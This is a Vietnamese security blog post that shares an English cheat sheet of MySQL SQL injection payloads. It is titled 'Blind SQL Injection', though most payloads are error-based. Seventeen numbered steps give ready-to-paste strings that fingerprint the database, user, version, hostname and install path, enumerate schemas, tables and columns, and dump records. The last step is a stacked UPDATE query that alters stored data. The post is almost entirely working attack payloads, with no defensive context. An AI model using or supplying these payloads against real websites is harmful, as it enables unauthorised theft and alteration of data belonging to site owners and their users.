HuuTuan .Info

Chia sẻ ATTT - CNTT - Đồ họa

Blind SQL Injection

By 6:06 PM Add Comment
Hôm nay mình share bài viết về cách khai thác Blind SQL Injection bằng tiếng anh khá hay và đầy đủ

    1. To test blind injection
    ' and 'x'='x
    2. To select the current database (Output will be in Hexadecimal, decode to ASCII
      ' and(select 1 from(select count,concat((select (select 
concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and '1'='1
    3. To find the current user
    1' and(select 1 from(select count,concat((select (select concat(0x7e,0x27,Hex(cast(user() 
as char)),0x27,0x7e)) from information_schema.tables limit 
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
    4. To find MySQL Version
    1' and(select 1 from(select 
count,concat((select (select 
concat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and '1'='1
    5. Find current database
    1' and(select 1 from(select count,concat((select (select 
concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and '1'='1
    6. To find the system user
    1' and(select 1 from(select count,concat((select (select 
concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and '1'='1
    7. To find the hostname
    1' and(select 1 from(select count,concat((select (select 
concat(0x7e,0x27,Hex(cast(@@hostname as char)),0x27,0x7e)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and '1'='1
    8. To find the installation directory
    1' and(select 1 from(select count,concat((select (select 
concat(0x7e,0x27,Hex(cast(@@basedir as char)),0x27,0x7e)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and '1'='1
    9. To find the DB User
    1' and(select 1 from(select count,concat((select (select (SELECT distinct 
concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM 
information_schema.user_privileges LIMIT 0,1)) from information_schema.tables 
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 
'1'='1
    10. To find the databases

    Note: Keep incrementing the n, e.g. : n, n+1, n+2, ... till you keep getting a response.

    1' and(select 1 from(select count,concat((select (select (SELECT distinct 
concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM 
information_schema.user_privileges LIMIT 1,1)) from information_schema.tables 
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 
'1'='1 

    1' and(select 1 from(select count,concat((select (select (SELECT distinct 
concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM 
information_schema.schemata LIMIT n,1)) from information_schema.tables limit 
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 

    1' and(select 1 from(select count,concat((select (select (SELECT distinct 
concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM 
information_schema.schemata LIMIT n+1,1)) from information_schema.tables limit 
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
    11. To count the number of tables in the selected database

    Note: Note this count as n
    Replace colored strings with appropriate value

    1' and(select 1 from(select count,concat((select (select (SELECT 
concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables 
WHERE table_schema=0xhex_code_of_database_name)) from information_schema.tables 
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 
'1'='1
    12. To get the table names in the selected database

    Note: m-n implies execute this query starting from m, m+1…n-1
    Replace colored strings with appropriate value

    1' and(select 1 
from(select count,concat((select (select (SELECT distinct 
concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM 
information_schema.tables Where table_schema=0xhex_code_of_database_name limit 
m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and '1'='1
    13. To get number of columns in the selected table name

    Note: Note this count as n
    Replace colored strings with appropriate value

    1' 
and(select 1 from(select count,concat((select (select (SELECT 
concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns 
WHERE table_schema=0xhex_code_of_database_name AND 
table_name=0xhex_code_of_table_name)) from information_schema.tables limit 
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
    14. To get column names of a selected table name

    Note: m-n implies execute this query starting from m, m+1…n-1
    Replace colored strings with appropriate value

    1' 
and(select 1 from(select count,concat((select (select (SELECT distinct 
concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM 
information_schema.columns Where table_schema=0xhex_code_of_database_name AND 
table_name=0xhex_code_of_table_name limit m-n,1)) from information_schema.tables 
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 
'1'='1
    15. To count the number of records in a selected column

    Note: Remember this count as n
    1' 
and(select 1 from(select count,concat((select (select (SELECT concat(0x7e,0x27,count,0x27,0x7e) FROM `database_name`.table_name)) from 
information_schema.tables limit 0,1),floor(rand(0)*2))x from 
information_schema.tables group by x)a) and '1'='1
    16. To fetch records from a selected column

    Note: m-n implies execute this query starting from m, m+1…n-1
    Replace colored strings with appropriate value
    1' and(select 1 from(select count,concat((select (select (SELECT 
concat(0x7e,0x27,Hex(cast(table_name.column_name as char)),0x27,0x7e) FROM 
`database_name`.table_name LIMIT m-n,1) ) from information_schema.tables limit 
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
    17. Update a record in the selected column
    1';UPDATE 
table_name SET column_name=0xhex_code_of_new_record_value WHERE 
column_name=0xhex_code_of_old_record_value-- 

0 Response to "Blind SQL Injection"

Post a Comment

Nội Quy Khi Comment:
» Các bài comment phải nghiêm túc, không dung tục, không spam.
» Nội dung phải liên quan tới chủ đề bài viết.
» Những nhận xét spam sẽ bị xóa.
» Sử dụng tài khoản Google để được trợ giúp.
» Nặc danh thường không được chào đón.
Note : Hãy để lại nhận xét bên dưới bạn nhé !

Subscribe to: Post Comments (Atom)

Quảng Cáo TOP

Quảng Cáo TOP 1

Quảng Cáo TOP 2

Quảng Cáo TOP